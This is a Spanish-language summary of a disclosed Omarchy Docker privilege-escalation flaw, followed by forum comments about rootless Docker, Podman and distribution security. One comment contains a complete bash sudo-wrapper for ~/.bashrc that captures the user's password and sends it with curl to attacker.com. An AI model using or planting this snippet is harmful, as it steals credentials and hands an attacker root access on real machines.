Omarchy: cualquier proceso de usuario puede escalar a root
Omarchy: Any User Process Can Escalate to Root
Una vulnerabilidad en la configuración predeterminada de Docker en Omarchy permitía a cualquier proceso del usuario escalar a root sin contraseña ni sudo. El investigador que la descubrió muestra cómo leer /etc/shadow con un simple comando docker run, y critica que la configuración fuera opt-out en lugar de opt-in, además de documentación engañosa. El problema afecta a versiones anteriores a 4.0.1, ya parcheado. El autor recomienda actualizar y sugiere Podman como alternativa más segura.
En otras palabras, un compromiso de una aplicación normal de usuario podría convertirse inmediatamente en un compromiso total de la máquina.
- concinds
Hace unos días alguien descubrió que estaban pasando descriptores USB directamente al shell.
https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8...
No uses distros vibecoded. No importa si arreglan esto o aquello, o si te importa una vulnerabilidad concreta. Esto no es sensato. Es la razón por la que dejaste Windows en primer lugar, ¿recuerdas?
- thehamkercat
Creo que la gente no debería saltar directamente a distros que están muy promocionadas en medios/YouTube, cachyOS tuvo una ola similar, y ahora Omarchy la tiene.
(ejemplo: NetworkChuck, Primeagen? y algunos otros)
también, archlinux es mucho más fácil de instalar hoy en día con archinstall [1], así que no estoy seguro de que realmente necesites otra capa opinada encima.
- mike_hearn
Linux no es como macOS, no tiene ningún tipo de arquitectura de sandboxing de escritorio adecuada que realmente funcione. Así que esto es una especie de teatro de seguridad. Si ejecutas un programa malicioso, puede hacer cosas como manipular tu PATH o explotar vulnerabilidades locales en aplicaciones para llegar al punto donde pueda controlar cualquier cosa que importe (que root generalmente no controla). Por ejemplo, puede simplemente colocar un shell personalizado en ~/.bin/.hidden-shell y reconfigurar el emulador de terminal para que lo ejecute.
Así que este tipo de "vulnerabilidad" no parece tan importante. Si ejecutas código como tú mismo en Linux, te posee.
En macOS es muy diferente. La firma de código generalizada da a todas las aplicaciones una identidad estable impuesta por el kernel de la que no pueden escapar fácilmente. El kernel puede entonces imponer políticas de sandboxing en cualquier aplicación que se ejecute, independientemente de cómo esté instalada, por ejemplo, impidiendo que las aplicaciones husmeen en ~/Documents o monitoricen tu pantalla. Los permisos son editables y se garantiza que se mantienen, incluso a través de actualizaciones. Y root está desempoderado, por lo que obtenerlo apenas importa, solo está ahí para compatibilidad UNIX.
Desafortunadamente, implementar una arquitectura estilo Apple en Linux sería muy difícil.
- exitb
No es genial, pero no estoy seguro de que esto deba enmarcarse como específico de Omarchy, cuando es una configuración muy común añadir al usuario regular al grupo docker.
- lrvick
Para ser justos, es fácil para el malware escalar a root en cualquier distro linux importante porque sudo es completamente teatro de seguridad.
El malware solo necesita poner esto en ~/.bashrc y esperar:
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}
- WhyNotHugo
No puedo entender por qué es tan común ejecutar docker como root en lugar de como un usuario sin privilegios.
Docker ha soportado el modo rootless durante años. Empaqueté docker-rootless en Arch/AUR hace más de 4 años, así que ha existido y ha sido estable durante todo ese tiempo.
Claro, en un servidor dedicado a ejecutar contenedores docker, quizás tenga sentido por las mejoras marginales en la latencia de red. Pero por lo demás, rootless debería ser siempre el predeterminado.
- trentnix
El problema de configuración de Docker se informó y se hicieron cambios rápidamente para abordarlo. Parece que este es un gran ejemplo de que el sistema funciona bien.
Omarchy parece una forma sencilla para un desarrollador como yo de probar hyprland y escribir código. También parece una gran manera de que mis hijos se interesen por las computadoras, ya que hay un harness de agente listo para ayudarles a gestionar su máquina y usar software libre, incluso lo que es un poco obtuso.
Estoy desconcertado de que la gente esté enojada por todo esto, pero luego recuerdo que ya no me importa lo que piensen los guardianes.
- andrewvc
Una vez que tienes una caja en la que se ha hecho vibe coding, no confiaría en nada de ella. Por eso hago vibe coding en una máquina completamente separada.
No soy usuario de Omarchy, pero ahora vivimos en un mundo donde la mayoría de las acciones (incluidas las que el LLM pide al usuario ejecutar como root) se originan en otro lugar que no es el cerebro del usuario.
Habrá un ajuste de cuentas en cuanto a cómo pensamos sobre la confianza y la autenticación en los próximos años. Es solo una cuestión de aumentar la gravedad de los incidentes.
- darkwi11ow
¿Por qué no usar podman sin root? Es 2026, no 2016, Podman funciona mucho mejor que Docker hoy en día.
- pkulak
Vaya... esto es realmente revelador. Esto no es un error oscuro. La página de instalación de Docker tiene una sección enorme que explica exactamente este problema. Cada sección de Docker en cada wiki de distro repasa este problema en detalle. Es el 80% de la razón por la que se creó Podman en primer lugar.